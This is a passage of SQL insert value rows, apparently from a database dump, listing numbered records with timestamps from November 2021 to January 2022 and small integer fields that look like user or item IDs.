(489, '2021-11-15 04:44:00', 1, 2059, 0, 1, 1),
(490, '2021-11-15 04:44:02', 1, 2064, 0, 1, 1),
(491, '2021-11-15 08:16:36', 1, 2064, 0, 1, 1),
(492, '2021-11-16 04:09:44', 1, 2061, 0, 1, 1),
(493, '2021-11-16 04:09:49', 1, 2059, 0, 1, 1),
(494, '2021-11-16 15:53:53', 1, 2064, 0, 1, 1),
(495, '2021-11-16 20:55:31', 1, 2060, 0, 1, 1),
(496, '2021-11-17 12:49:32', 1, 2058, 0, 1, 1),
(497, '2021-11-17 12:49:38', 1, 2060, 0, 1, 1),
(498, '2021-11-17 12:49:41', 1, 2064, 0, 1, 1),
(499, '2021-11-17 12:49:46', 1, 2062, 0, 1, 1),
(500, '2021-11-17 17:49:13', 1, 2054, 0, 1, 1),
(501, '2021-11-17 22:26:20', 1, 2059, 0, 1, 1),
(502, '2021-11-18 06:23:05', 1, 2062, 0, 1, 1),
(503, '2021-11-18 07:27:56', 1, 2063, 0, 1, 1),
(504, '2021-11-18 23:11:53', 1, 2060, 0, 1, 1),
(505, '2021-11-19 06:57:29', 1, 2059, 0, 1, 1),
(506, '2021-11-19 09:41:04', 1, 2064, 0, 1, 1),
(507, '2021-11-19 14:25:53', 1, 2063, 0, 1, 1),
(508, '2021-11-20 05:23:12', 1, 2055, 0, 1, 1),
(509, '2021-11-20 11:55:30', 1, 2061, 0, 1, 1),
(510, '2021-11-20 12:21:26', 1, 2058, 0, 1, 1),
(511, '2021-11-20 12:47:22', 1, 2064, 0, 1, 1),
(512, '2021-11-20 19:01:35', 1, 2064, 98, 1, 1),
(513, '2021-11-20 19:01:56', 1, 2064, 98, 1, 1),
(514, '2021-11-20 19:02:11', 1, 2064, 98, 1, 1),
(515, '2021-11-20 19:14:53', 1, 2060, 0, 1, 1),
(516, '2021-11-20 19:14:56', 1, 2063, 0, 1, 1),
(517, '2021-11-20 19:14:58', 1, 2058, 0, 1, 1),
(518, '2021-11-20 19:15:05', 1, 2055, 0, 1, 1),
(519, '2021-11-20 19:15:15', 1, 2061, 0, 1, 1),
(520, '2021-11-20 19:15:21', 1, 2062, 0, 1, 1),
(521, '2021-11-20 19:15:30', 1, 2054, 0, 1, 1),
(522, '2021-11-20 19:15:33', 1, 2059, 0, 1, 1),
(523, '2021-11-20 19:15:36', 1, 2064, 0, 1, 1),
(524, '2021-11-21 01:36:59', 1, 2054, 0, 1, 1),
(525, '2021-11-21 12:25:36', 1, 2058, 0, 1, 1),
(526, '2021-11-21 16:48:28', 1, 2064, 0, 1, 1),
(527, '2021-11-21 20:35:03', 1, 2055, 0, 1, 1),
(528, '2021-11-22 00:24:19', 1, 2058, 0, 1, 1),
(529, '2021-11-22 02:34:42', 1, 2058, 0, 1, 1),
(530, '2021-11-22 05:44:31', 1, 2060, 0, 1, 1),
(531, '2021-11-22 23:21:11', 1, 2055, 0, 1, 1),
(532, '2021-11-24 18:25:49', 1, 2058, 0, 1, 1),
(533, '2021-11-25 01:45:43', 1, 2055, 0, 1, 1),
(534, '2021-11-25 03:17:43', 1, 2053, 0, 1, 1),
(535, '2021-11-25 20:20:59', 1, 2061, 0, 1, 1),
(536, '2021-11-26 05:55:36', 1, 2061, 0, 1, 1),
(537, '2021-11-26 16:43:08', 1, 2061, 0, 1, 1),
(538, '2021-11-26 19:42:21', 1, 2055, 0, 1, 1),
(539, '2021-11-27 00:58:23', 1, 2058, 0, 1, 1),
(540, '2021-11-27 08:47:07', 1, 2064, 0, 1, 1),
(541, '2021-11-27 12:00:12', 1, 2064, 0, 1, 1),
(542, '2021-11-27 12:00:20', 1, 2062, 0, 1, 1),
(543, '2021-11-27 12:00:25', 1, 2063, 0, 1, 1),
(544, '2021-11-27 20:21:09', 1, 2058, 0, 1, 1),
(545, '2021-11-27 21:01:22', 1, 2064, 0, 1, 1),
(546, '2021-11-28 11:42:06', 1, 2054, 0, 1, 1),
(547, '2021-11-28 19:45:41', 1, 2055, 0, 1, 1),
(548, '2021-11-28 22:16:09', 1, 2055, 0, 1, 1),
(549, '2021-11-28 23:00:57', 1, 2060, 0, 1, 1),
(550, '2021-11-29 12:10:37', 1, 2061, 0, 1, 1),
(551, '2021-11-30 11:40:41', 1, 2054, 0, 1, 1),
(552, '2021-11-30 12:24:54', 1, 2055, 0, 1, 1),
(553, '2021-11-30 18:02:36', 1, 2054, 0, 1, 1),
(554, '2021-11-30 18:02:39', 1, 2055, 0, 1, 1),
(555, '2021-11-30 18:02:51', 1, 2064, 0, 1, 1),
(556, '2021-11-30 18:02:54', 1, 2063, 0, 1, 1),
(557, '2021-11-30 18:02:57', 1, 2062, 0, 1, 1),
(558, '2021-11-30 18:03:00', 1, 2060, 0, 1, 1),
(559, '2021-11-30 18:03:04', 1, 2059, 0, 1, 1),
(560, '2021-11-30 18:03:07', 1, 2061, 0, 1, 1),
(561, '2021-11-30 18:03:10', 1, 2058, 0, 1, 1),
(562, '2021-12-01 02:45:03', 1, 2053, 0, 1, 1),
(563, '2021-12-01 09:04:52', 1, 2063, 0, 1, 1),
(564, '2021-12-02 05:44:30', 1, 2061, 0, 1, 1),
(565, '2021-12-02 07:33:42', 1, 2058, 0, 1, 1),
(566, '2021-12-02 08:36:14', 1, 2064, 0, 1, 1),
(567, '2021-12-02 16:12:33', 1, 2063, 0, 1, 1),
(568, '2021-12-02 22:20:20', 1, 2059, 0, 1, 1),
(569, '2021-12-03 01:45:17', 1, 2061, 0, 1, 1),
(570, '2021-12-03 09:59:15', 1, 2064, 119, 1, 1),
(571, '2021-12-03 10:04:14', 1, 2064, 119, 1, 1),
(572, '2021-12-03 10:06:36', 1, 2064, 119, 1, 1),
(573, '2021-12-03 16:00:57', 1, 2061, 0, 1, 1),
(574, '2021-12-03 16:12:18', 1, 2064, 0, 1, 1),
(575, '2021-12-03 16:23:39', 1, 2055, 0, 1, 1),
(576, '2021-12-03 16:35:00', 1, 2058, 0, 1, 1),
(577, '2021-12-04 02:53:55', 1, 2058, 0, 1, 1),
(578, '2021-12-04 13:13:17', 1, 2055, 0, 1, 1),
(579, '2021-12-04 22:30:24', 1, 2060, 0, 1, 1),
(580, '2021-12-05 21:55:00', 1, 2061, 0, 1, 1),
(581, '2021-12-06 17:47:58', 1, 2055, 0, 1, 1),
(582, '2021-12-06 18:50:31', 1, 2058, 0, 1, 1),
(583, '2021-12-07 01:01:09', 1, 2060, 0, 1, 1),
(584, '2021-12-08 04:00:28', 1, 2061, 0, 1, 1),
(585, '2021-12-08 16:46:17', 1, 2054, 0, 1, 1),
(586, '2021-12-08 20:38:30', 1, 2064, 0, 1, 1),
(587, '2021-12-08 20:39:49', 1, 2062, 0, 1, 1),
(588, '2021-12-08 20:40:13', 1, 2063, 0, 1, 1),
(589, '2021-12-08 20:40:21', 1, 2061, 0, 1, 1),
(590, '2021-12-08 20:40:29', 1, 2059, 0, 1, 1),
(591, '2021-12-08 20:40:38', 1, 2058, 0, 1, 1),
(592, '2021-12-08 20:41:01', 1, 2055, 0, 1, 1),
(593, '2021-12-08 20:41:10', 1, 2054, 0, 1, 1),
(594, '2021-12-08 20:41:39', 1, 2060, 0, 1, 1),
(595, '2021-12-09 01:41:23', 1, 2064, 0, 1, 1),
(596, '2021-12-09 03:53:00', 1, 2053, 0, 1, 1),
(597, '2021-12-09 04:54:17', 1, 2055, 0, 1, 1),
(598, '2021-12-09 05:30:40', 1, 2055, 0, 1, 1),
(599, '2021-12-10 08:11:40', 1, 2064, 0, 1, 1),
(600, '2021-12-10 16:21:36', 1, 2059, 0, 1, 1),
(601, '2021-12-10 17:06:38', 1, 2059, 0, 1, 1),
(602, '2021-12-11 04:48:09', 1, 2059, 0, 1, 1),
(603, '2021-12-11 04:49:06', 1, 2061, 0, 1, 1),
(604, '2021-12-11 06:10:20', 1, 2061, 0, 1, 1),
(605, '2021-12-11 16:42:50', 1, 2058, 0, 1, 1),
(606, '2021-12-11 18:30:45', 1, 2055, 0, 1, 1),
(607, '2021-12-12 05:35:36', 1, 2055, 0, 1, 1),
(608, '2021-12-12 09:22:34', 1, 2064, 0, 1, 1),
(609, '2021-12-13 00:14:22', 1, 2064, 0, 1, 1),
(610, '2021-12-13 13:24:58', 1, 2064, 0, 1, 1),
(611, '2021-12-14 12:22:36', 1, 2059, 0, 1, 1),
(612, '2021-12-14 12:45:36', 1, 2064, 0, 1, 1),
(613, '2021-12-14 13:32:01', 1, 2055, 0, 1, 1),
(614, '2021-12-14 15:11:45', 1, 2063, 0, 1, 1),
(615, '2021-12-14 19:25:33', 1, 2054, 0, 1, 1),
(616, '2021-12-15 01:19:55', 1, 2060, 0, 1, 1),
(617, '2021-12-15 03:33:59', 1, 2064, 0, 1, 1),
(618, '2021-12-15 20:22:58', 1, 2058, 0, 1, 1),
(619, '2021-12-15 23:24:59', 1, 2058, 0, 1, 1),
(620, '2021-12-16 16:27:35', 1, 2055, 0, 1, 1),
(621, '2021-12-16 20:02:30', 1, 2054, 0, 1, 1),
(622, '2021-12-17 04:41:24', 1, 2064, 0, 1, 1),
(623, '2021-12-17 21:28:17', 1, 2058, 0, 1, 1),
(624, '2021-12-17 23:51:32', 1, 2059, 0, 1, 1),
(625, '2021-12-18 15:41:09', 1, 2055, 0, 1, 1),
(626, '2021-12-19 02:11:57', 1, 2064, 0, 1, 1),
(627, '2021-12-19 02:13:24', 1, 2062, 0, 1, 1),
(628, '2021-12-19 02:13:50', 1, 2063, 0, 1, 1),
(629, '2021-12-19 02:13:57', 1, 2061, 0, 1, 1),
(630, '2021-12-19 02:14:08', 1, 2059, 0, 1, 1),
(631, '2021-12-19 02:14:17', 1, 2058, 0, 1, 1),
(632, '2021-12-19 02:14:26', 1, 2055, 0, 1, 1),
(633, '2021-12-19 02:14:40', 1, 2054, 0, 1, 1),
(634, '2021-12-19 02:14:57', 1, 2060, 0, 1, 1),
(635, '2021-12-19 02:20:14', 1, 2053, 0, 1, 1),
(636, '2021-12-19 05:39:21', 1, 2061, 0, 1, 1),
(637, '2021-12-19 14:18:17', 1, 2061, 0, 1, 1),
(638, '2021-12-19 18:00:34', 1, 2062, 0, 1, 1),
(639, '2021-12-19 19:47:47', 1, 2059, 0, 1, 1),
(640, '2021-12-20 01:00:43', 1, 2059, 0, 1, 1),
(641, '2021-12-21 00:01:18', 1, 2060, 0, 1, 1),
(642, '2021-12-21 00:02:15', 1, 2060, 0, 1, 1),
(643, '2021-12-21 02:07:40', 1, 2062, 0, 1, 1),
(644, '2021-12-21 07:07:58', 1, 2060, 0, 1, 1),
(645, '2021-12-22 07:33:49', 1, 2064, 143, 1, 1),
(646, '2021-12-22 07:35:56', 1, 2064, 143, 1, 1),
(647, '2021-12-22 07:37:08', 1, 2064, 143, 1, 1),
(648, '2021-12-22 07:38:10', 1, 2064, 143, 1, 1),
(649, '2021-12-22 11:22:02', 1, 2064, 0, 1, 1),
(650, '2021-12-22 16:54:55', 1, 2064, 0, 1, 1),
(651, '2021-12-22 19:41:34', 1, 2055, 0, 1, 1),
(652, '2021-12-22 21:06:03', 1, 2060, 0, 1, 1),
(653, '2021-12-22 21:23:51', 1, 2054, 0, 1, 1),
(654, '2021-12-23 08:59:03', 1, 2061, 0, 1, 1),
(655, '2021-12-23 16:32:52', 1, 2055, 0, 1, 1),
(656, '2021-12-23 16:32:54', 1, 2058, 0, 1, 1),
(657, '2021-12-23 19:25:06', 1, 2055, 0, 1, 1),
(658, '2021-12-23 22:52:51', 1, 2063, 0, 1, 1),
(659, '2021-12-23 23:08:48', 1, 2063, 0, 1, 1),
(660, '2021-12-23 23:10:27', 1, 2058, 0, 1, 1),
(661, '2021-12-24 00:07:58', 1, 2062, 0, 1, 1),
(662, '2021-12-24 00:37:15', 1, 2054, 0, 1, 1),
(663, '2021-12-24 00:37:54', 1, 2059, 0, 1, 1),
(664, '2021-12-24 03:21:27', 1, 2055, 0, 1, 1),
(665, '2021-12-24 04:19:43', 1, 2060, 0, 1, 1),
(666, '2021-12-24 14:06:01', 1, 2055, 0, 1, 1),
(667, '2021-12-24 19:32:42', 1, 2054, 0, 1, 1),
(668, '2021-12-24 19:32:51', 1, 2055, 0, 1, 1),
(669, '2021-12-24 19:33:25', 1, 2064, 0, 1, 1),
(670, '2021-12-24 19:33:34', 1, 2063, 0, 1, 1),
(671, '2021-12-24 19:33:43', 1, 2062, 0, 1, 1),
(672, '2021-12-24 19:33:51', 1, 2060, 0, 1, 1),
(673, '2021-12-24 19:34:00', 1, 2059, 0, 1, 1),
(674, '2021-12-24 19:34:10', 1, 2061, 0, 1, 1),
(675, '2021-12-24 19:34:20', 1, 2058, 0, 1, 1),
(676, '2021-12-24 23:40:03', 1, 2054, 0, 1, 1),
(677, '2021-12-25 05:08:51', 1, 2053, 0, 1, 1),
(678, '2021-12-26 14:58:13', 1, 2058, 0, 1, 1),
(679, '2021-12-27 14:02:35', 1, 2060, 0, 1, 1),
(680, '2021-12-28 12:41:48', 1, 2061, 0, 1, 1),
(681, '2021-12-28 23:50:40', 1, 2059, 0, 1, 1),
(682, '2021-12-29 07:03:28', 1, 2064, 0, 1, 1),
(683, '2021-12-29 07:03:41', 1, 2063, 0, 1, 1),
(684, '2021-12-29 07:03:51', 1, 2062, 0, 1, 1),
(685, '2021-12-29 07:04:01', 1, 2061, 0, 1, 1),
(686, '2021-12-29 07:04:13', 1, 2060, 0, 1, 1),
(687, '2021-12-29 07:04:25', 1, 2059, 0, 1, 1),
(688, '2021-12-29 07:04:32', 1, 2058, 0, 1, 1),
(689, '2021-12-29 07:04:42', 1, 2055, 0, 1, 1),
(690, '2021-12-29 07:04:56', 1, 2054, 0, 1, 1),
(691, '2021-12-29 07:18:12', 1, 2053, 0, 1, 1),
(692, '2021-12-30 00:14:12', 1, 2054, 0, 1, 1),
(693, '2021-12-30 00:35:26', 1, 2055, 0, 1, 1),
(694, '2021-12-30 03:34:42', 1, 2060, 0, 1, 1),
(695, '2021-12-30 04:53:38', 1, 2062, 0, 1, 1),
(696, '2021-12-30 20:35:15', 1, 2059, 0, 1, 1),
(697, '2021-12-30 23:22:06', 1, 2061, 0, 1, 1),
(698, '2021-12-31 04:53:35', 1, 2058, 0, 1, 1),
(699, '2021-12-31 14:31:05', 1, 2058, 0, 1, 1),
(700, '2021-12-31 16:40:45', 1, 2064, 151, 1, 1),
(701, '2021-12-31 16:41:52', 1, 2064, 151, 1, 1),
(702, '2021-12-31 16:42:18', 1, 2064, 151, 1, 1),
(703, '2021-12-31 17:31:15', 1, 2058, 0, 1, 1),
(704, '2021-12-31 18:48:25', 1, 2063, 0, 1, 1),
(705, '2021-12-31 21:00:59', 1, 2062, 0, 1, 1),
(706, '2021-12-31 21:33:33', 1, 2055, 0, 1, 1),
(707, '2021-12-31 21:58:35', 1, 2061, 0, 1, 1),
(708, '2021-12-31 22:17:14', 1, 2062, 0, 1, 1),
(709, '2021-12-31 22:17:44', 1, 2064, 0, 1, 1),
(710, '2021-12-31 22:18:12', 1, 2060, 0, 1, 1),
(711, '2021-12-31 22:18:16', 1, 2059, 0, 1, 1),
(712, '2021-12-31 22:18:21', 1, 2063, 0, 1, 1),
(713, '2021-12-31 22:18:23', 1, 2054, 0, 1, 1),
(714, '2021-12-31 22:18:26', 1, 2058, 0, 1, 1),
(715, '2021-12-31 22:21:08', 1, 2061, 0, 1, 1),
(716, '2021-12-31 22:22:09', 1, 2055, 0, 1, 1),
(717, '2021-12-31 22:25:23', 1, 2064, 0, 1, 1),
(718, '2021-12-31 22:36:58', 1, 2060, 0, 1, 1),
(719, '2021-12-31 23:46:47', 1, 2059, 0, 1, 1),
(720, '2022-01-01 13:18:58', 1, 2064, 0, 1, 1),
(721, '2022-01-01 13:19:11', 1, 2063, 0, 1, 1),
(722, '2022-01-01 13:19:23', 1, 2062, 0, 1, 1),
(723, '2022-01-01 17:27:51', 1, 2054, 0, 1, 1),
(724, '2022-01-01 21:34:35', 1, 2055, 0, 1, 1),
(725, '2022-01-02 00:47:56', 1, 2054, 0, 1, 1),
(726, '2022-01-03 12:58:06', 1, 2060, 0, 1, 1),
(727, '2022-01-04 12:23:36', 1, 2062, 0, 1, 1),
(728, '2022-01-04 18:39:35', 1, 2062, 0, 1, 1),
(729, '2022-01-04 19:21:53', 1, 2061, 0, 1, 1),
(730, '2022-01-04 19:44:27', 1, 2055, 0, 1, 1),
(731, '2022-01-05 02:25:31', 1, 2055, 0, 1, 1),
(732, '2022-01-05 06:47:55', 1, 2061, 0, 1, 1),
(733, '2022-01-05 07:51:57', 1, 2061, 0, 1, 1),
(734, '2022-01-05 08:29:31', 1, 2055, 0, 1, 1),
(735, '2022-01-05 08:36:57', 1, 2064, 0, 1, 1),
(736, '2022-01-05 08:45:55', 1, 2064, 0, 1, 1),
(737, '2022-01-05 09:15:55', 1, 2064, 0, 1, 1),
(738, '2022-01-05 09:53:11', 1, 2058, 0, 1, 1),
(739, '2022-01-05 09:57:41', 1, 2062, 0, 1, 1),
(740, '2022-01-05 11:09:37', 1, 2062, 0, 1, 1),
(741, '2022-01-05 13:24:29', 1, 2055, 0, 1, 1),
(742, '2022-01-05 18:57:54', 1, 2064, 0, 1, 1),
(743, '2022-01-06 04:12:26', 1, 2064, 0, 1, 1),
(744, '2022-01-06 04:12:46', 1, 2062, 0, 1, 1),
(745, '2022-01-06 04:12:56', 1, 2063, 0, 1, 1),
(746, '2022-01-06 04:12:58', 1, 2061, 0, 1, 1),
(747, '2022-01-06 04:13:01', 1, 2059, 0, 1, 1),
(748, '2022-01-06 04:13:03', 1, 2058, 0, 1, 1),
(749, '2022-01-06 04:13:05', 1, 2055, 0, 1, 1),
(750, '2022-01-06 04:13:07', 1, 2054, 0, 1, 1),
(751, '2022-01-06 04:13:10', 1, 2060, 0, 1, 1),
(752, '2022-01-06 06:12:00', 1, 2054, 0, 1, 1),
(753, '2022-01-06 09:28:38', 1, 2061, 0, 1, 1),
(754, '2022-01-07 09:31:13', 1, 2058, 0, 1, 1),
(755, '2022-01-07 09:31:16', 1, 2061, 0, 1, 1),
(756, '2022-01-07 09:31:17', 1, 2062, 0, 1, 1),
(757, '2022-01-07 09:31:27', 1, 2060, 0, 1, 1),
(758, '2022-01-07 09:31:32', 1, 2063, 0, 1, 1),
(759, '2022-01-07 09:31:37', 1, 2059, 0, 1, 1),
(760, '2022-01-07 09:31:44', 1, 2064, 0, 1, 1),
(761, '2022-01-07 09:31:52', 1, 2055, 0, 1, 1),
(762, '2022-01-07 11:30:30', 1, 2061, 0, 1, 1),
(763, '2022-01-07 23:07:02', 1, 2061, 0, 1, 1),
(764, '2022-01-08 00:14:25', 1, 2064, 0, 1, 1),
(765, '2022-01-08 09:48:21', 1, 2064, 0, 1, 1),
(766, '2022-01-08 10:33:16', 1, 2061, 0, 1, 1),
(767, '2022-01-08 10:33:22', 1, 2064, 0, 1, 1),
(768, '2022-01-08 12:56:11', 1, 2054, 0, 1, 1),
(769, '2022-01-08 18:03:16', 1, 2062, 0, 1, 1),
(770, '2022-01-08 21:23:44', 1, 2064, 0, 1, 1),
(771, '2022-01-08 22:09:12', 1, 2061, 0, 1, 1),
(772, '2022-01-08 22:41:11', 1, 2055, 0, 1, 1),
(773, '2022-01-09 06:06:05', 1, 2062, 0, 1, 1),
(774, '2022-01-09 09:57:31', 1, 2059, 0, 1, 1),
(775, '2022-01-09 09:57:39', 1, 2064, 0, 1, 1),
(776, '2022-01-09 09:57:45', 1, 2060, 0, 1, 1),
(777, '2022-01-09 09:58:01', 1, 2061, 0, 1, 1),
(778, '2022-01-09 11:22:08', 1, 2054, 0, 1, 1),
(779, '2022-01-09 11:22:20', 1, 2055, 0, 1, 1),
(780, '2022-01-09 11:22:25', 1, 2064, 0, 1, 1),
(781, '2022-01-09 11:22:25', 1, 2063, 0, 1, 1),
(782, '2022-01-09 11:22:26', 1, 2060, 0, 1, 1),
(783, '2022-01-09 11:22:27', 1, 2059, 0, 1, 1),
(784, '2022-01-09 11:22:28', 1, 2062, 0, 1, 1),
(785, '2022-01-09 11:22:30', 1, 2058, 0, 1, 1),
(786, '2022-01-09 11:22:31', 1, 2061, 0, 1, 1),
(787, '2022-01-09 18:01:51', 1, 2064, 0, 1, 1),
(788, '2022-01-09 18:01:57', 1, 2061, 0, 1, 1),
(789, '2022-01-09 18:54:39', 1, 2059, 0, 1, 1),
(790, '2022-01-09 19:47:33', 1, 2059, 0, 1, 1),
(791, '2022-01-10 10:56:58', 1, 2064, 0, 1, 1),
(792, '2022-01-10 10:57:02', 1, 2064, 0, 1, 1),
(793, '2022-01-10 10:57:04', 1, 2064, 0, 1, 1),
(794, '2022-01-10 10:57:07', 1, 2064, 0, 1, 1),
(795, '2022-01-10 10:57:10', 1, 2063, 0, 1, 1),
(796, '2022-01-10 10:57:12', 1, 2063, 0, 1, 1),
(797, '2022-01-10 10:57:15', 1, 2062, 0, 1, 1),
(798, '2022-01-10 10:57:18', 1, 2062, 0, 1, 1),
(799, '2022-01-10 10:57:20', 1, 2061, 0, 1, 1),
(800, '2022-01-10 10:57:23', 1, 2061, 0, 1, 1),
(801, '2022-01-10 10:57:26', 1, 2060, 0, 1, 1),
(802, '2022-01-10 10:57:34', 1, 2061, 0, 1, 1),
(803, '2022-01-10 10:57:37', 1, 2059, 0, 1, 1),
(804, '2022-01-10 10:57:39', 1, 2059, 0, 1, 1),
(805, '2022-01-10 10:57:41', 1, 2058, 0, 1, 1),
(806, '2022-01-10 10:57:44', 1, 2058, 0, 1, 1),
(807, '2022-01-10 10:57:46', 1, 2054, 0, 1, 1),
(808, '2022-01-10 10:57:49', 1, 2054, 0, 1, 1),
(809, '2022-01-10 10:57:51', 1, 2064, 0, 1, 1),
(810, '2022-01-10 10:57:54', 1, 2064, 0, 1, 1),
(811, '2022-01-10 10:57:56', 1, 2064, 0, 1, 1),
(812, '2022-01-10 10:57:59', 1, 2063, 0, 1, 1),
(813, '2022-01-10 10:58:01', 1, 2063, 0, 1, 1),
(814, '2022-01-10 10:58:04', 1, 2062, 0, 1, 1),
(815, '2022-01-10 10:58:06', 1, 2062, 0, 1, 1),
(816, '2022-01-10 10:58:09', 1, 2061, 0, 1, 1),
(817, '2022-01-10 10:58:11', 1, 2061, 0, 1, 1),
(818, '2022-01-10 13:17:04', 1, 2055, 0, 1, 1),
(819, '2022-01-11 01:29:14', 1, 2055, 0, 1, 1),
(820, '2022-01-11 05:06:47', 1, 2060, 0, 1, 1),
(821, '2022-01-11 07:28:19', 1, 2062, 0, 1, 1),
(822, '2022-01-11 09:56:59', 1, 2061, 0, 1, 1),
(823, '2022-01-11 10:27:54', 1, 2054, 0, 1, 1),
(824, '2022-01-11 10:27:58', 1, 2055, 0, 1, 1),
(825, '2022-01-11 10:28:13', 1, 2064, 0, 1, 1),
(826, '2022-01-11 10:28:17', 1, 2063, 0, 1, 1),
(827, '2022-01-11 10:28:23', 1, 2062, 0, 1, 1),
(828, '2022-01-11 10:28:29', 1, 2060, 0, 1, 1),
(829, '2022-01-11 10:28:33', 1, 2059, 0, 1, 1),
(830, '2022-01-11 10:28:37', 1, 2061, 0, 1, 1),
(831, '2022-01-11 10:28:41', 1, 2058, 0, 1, 1),
(832, '2022-01-11 14:42:53', 1, 2053, 0, 1, 1),
(833, '2022-01-11 17:24:34', 1, 2053, 0, 1, 1),
(834, '2022-01-11 21:44:41', 1, 2061, 0, 1, 1),
(835, '2022-01-11 21:55:03', 1, 2058, 0, 1, 1),
(836, '2022-01-12 06:48:23', 1, 2062, 0, 1, 1),
(837, '2022-01-12 12:29:45', 1, 2061, 0, 1, 1),
(838, '2022-01-12 14:42:11', 1, 2064, 186, 1, 1),
(839, '2022-01-12 14:43:49', 1, 2064, 186, 1, 1),
(840, '2022-01-12 14:44:42', 1, 2064, 186, 1, 1),
(841, '2022-01-12 14:45:36', 1, 2064, 186, 1, 1),
(842, '2022-01-12 19:20:55', 1, 2061, 0, 1, 1),
(843, '2022-01-12 21:36:19', 1, 2053, 0, 1, 1),
(844, '2022-01-12 22:55:46', 1, 2061, 0, 1, 1),
(845, '2022-01-13 01:23:23', 1, 2064, 0, 1, 1),
(846, '2022-01-13 02:50:59', 1, 2055, 0, 1, 1),
(847, '2022-01-13 03:08:15', 1, 2064, 0, 1, 1),
(848, '2022-01-13 03:08:53', 1, 2062, 0, 1, 1),
(849, '2022-01-13 03:09:04', 1, 2063, 0, 1, 1),
(850, '2022-01-13 03:09:06', 1, 2061, 0, 1, 1),
(851, '2022-01-13 03:09:08', 1, 2059, 0, 1, 1),
(852, '2022-01-13 03:09:11', 1, 2058, 0, 1, 1),
(853, '2022-01-13 03:09:14', 1, 2055, 0, 1, 1),
(854, '2022-01-13 03:09:16', 1, 2054, 0, 1, 1),
(855, '2022-01-13 03:09:25', 1, 2060, 0, 1, 1),
(856, '2022-01-13 06:35:55', 1, 2061, 0, 1, 1),
(857, '2022-01-13 17:50:55', 1, 2061, 0, 1, 1),
(858, '2022-01-13 19:01:59', 1, 2060, 0, 1, 1),
(859, '2022-01-13 20:11:34', 1, 2054, 0, 1, 1),
(860, '2022-01-14 00:37:31', 1, 2064, 0, 1, 1),
(861, '2022-01-14 01:27:38', 1, 2064, 0, 1, 1),
(862, '2022-01-14 01:51:15', 1, 2064, 191, 1, 1),
(863, '2022-01-14 01:53:12', 1, 2064, 191, 1, 1),
(864, '2022-01-14 01:55:24', 1, 2064, 191, 1, 1),
(865, '2022-01-14 01:56:27', 1, 2064, 191, 1, 1),
(866, '2022-01-14 04:18:56', 1, 2055, 0, 1, 1),
(867, '2022-01-14 23:07:09', 1, 2059, 0, 1, 1),
(868, '2022-01-15 00:00:03', 1, 2061, 0, 1, 1),
(869, '2022-01-15 01:11:41', 1, 2062, 0, 1, 1),
(870, '2022-01-15 08:46:14', 1, 2055, 0, 1, 1),
(871, '2022-01-15 11:28:04', 4, 2061, 193, 1, 1),
(872, '2022-01-16 13:15:39', 1, 2055, 0, 1, 1),
(873, '2022-01-16 15:32:49', 1, 2064, 0, 1, 1),
(874, '2022-01-16 17:56:26', 1, 2054, 0, 1, 1),
(875, '2022-01-17 04:39:03', 1, 2055, 0, 1, 1),
(876, '2022-01-17 06:43:59', 1, 2064, 0, 1, 1),
(877, '2022-01-17 06:44:40', 1, 2062, 0, 1, 1),
(878, '2022-01-17 06:44:51', 1, 2063, 0, 1, 1),
(879, '2022-01-17 06:44:53', 1, 2061, 0, 1, 1),
(880, '2022-01-17 06:44:55', 1, 2059, 0, 1, 1),
(881, '2022-01-17 06:44:58', 1, 2058, 0, 1, 1),
(882, '2022-01-17 06:45:00', 1, 2055, 0, 1, 1),
(883, '2022-01-17 06:45:02', 1, 2054, 0, 1, 1),
(884, '2022-01-17 06:45:15', 1, 2060, 0, 1, 1),
(885, '2022-01-17 22:45:49', 1, 2064, 0, 1, 1),
(886, '2022-01-18 01:07:23', 1, 2059, 0, 1, 1),
(887, '2022-01-18 12:52:31', 1, 2054, 0, 1, 1),
(888, '2022-01-18 12:52:36', 1, 2055, 0, 1, 1),
(889, '2022-01-18 12:52:56', 1, 2064, 0, 1, 1),
(890, '2022-01-18 12:53:02', 1, 2063, 0, 1, 1),
(891, '2022-01-18 12:53:07', 1, 2062, 0, 1, 1),
(892, '2022-01-18 12:53:14', 1, 2060, 0, 1, 1),
(893, '2022-01-18 12:53:18', 1, 2059, 0, 1, 1),
(894, '2022-01-18 12:53:22', 1, 2061, 0, 1, 1),
(895, '2022-01-18 12:53:26', 1, 2058, 0, 1, 1),
(896, '2022-01-18 17:53:25', 1, 2053, 0, 1, 1),
(897, '2022-01-18 19:28:56', 1, 2058, 0, 1, 1),
(898, '2022-01-18 19:28:57', 1, 2061, 0, 1, 1),
(899, '2022-01-18 19:28:58', 1, 2062, 0, 1, 1),
(900, '2022-01-18 19:29:00', 1, 2060, 0, 1, 1),
(901, '2022-01-18 19:29:01', 1, 2063, 0, 1, 1),
(902, '2022-01-18 19:29:03', 1, 2059, 0, 1, 1),
(903, '2022-01-18 19:29:04', 1, 2064, 0, 1, 1),
(904, '2022-01-18 19:29:06', 1, 2055, 0, 1, 1),
(905, '2022-01-18 22:46:48', 1, 2064, 0, 1, 1),
(906, '2022-01-18 22:56:24', 1, 2062, 0, 1, 1),
(907, '2022-01-19 02:11:04', 1, 2060, 0, 1, 1),
(908, '2022-01-19 02:47:19', 1, 2062, 0, 1, 1),
(909, '2022-01-19 03:17:20', 1, 2062, 0, 1, 1),
(910, '2022-01-19 05:24:48', 1, 2061, 0, 1, 1),
(911, '2022-01-19 10:04:24', 1, 2058, 0, 1, 1),
(912, '2022-01-19 10:05:45', 1, 2054, 0, 1, 1),
(913, '2022-01-19 10:05:48', 1, 2055, 0, 1, 1),
(914, '2022-01-19 10:05:52', 1, 2064, 0, 1, 1),
(915, '2022-01-19 10:05:55', 1, 2063, 0, 1, 1),
(916, '2022-01-19 10:06:01', 1, 2062, 0, 1, 1),
(917, '2022-01-19 10:06:06', 1, 2060, 0, 1, 1),
(918, '2022-01-19 10:06:13', 1, 2059, 0, 1, 1),
(919, '2022-01-19 10:06:21', 1, 2061, 0, 1, 1),
(920, '2022-01-19 10:32:18', 1, 2053, 0, 1, 1),
(921, '2022-01-19 10:32:32', 1, 2054, 0, 1, 1),
(922, '2022-01-19 10:32:49', 1, 2055, 0, 1, 1),
(923, '2022-01-19 10:33:59', 1, 2064, 0, 1, 1),
(924, '2022-01-19 10:34:03', 1, 2063, 0, 1, 1),
(925, '2022-01-19 10:34:06', 1, 2062, 0, 1, 1),
(926, '2022-01-19 10:34:09', 1, 2060, 0, 1, 1),
(927, '2022-01-19 10:34:11', 1, 2059, 0, 1, 1),
(928, '2022-01-19 10:34:14', 1, 2061, 0, 1, 1),
(929, '2022-01-19 10:34:16', 1, 2058, 0, 1, 1),
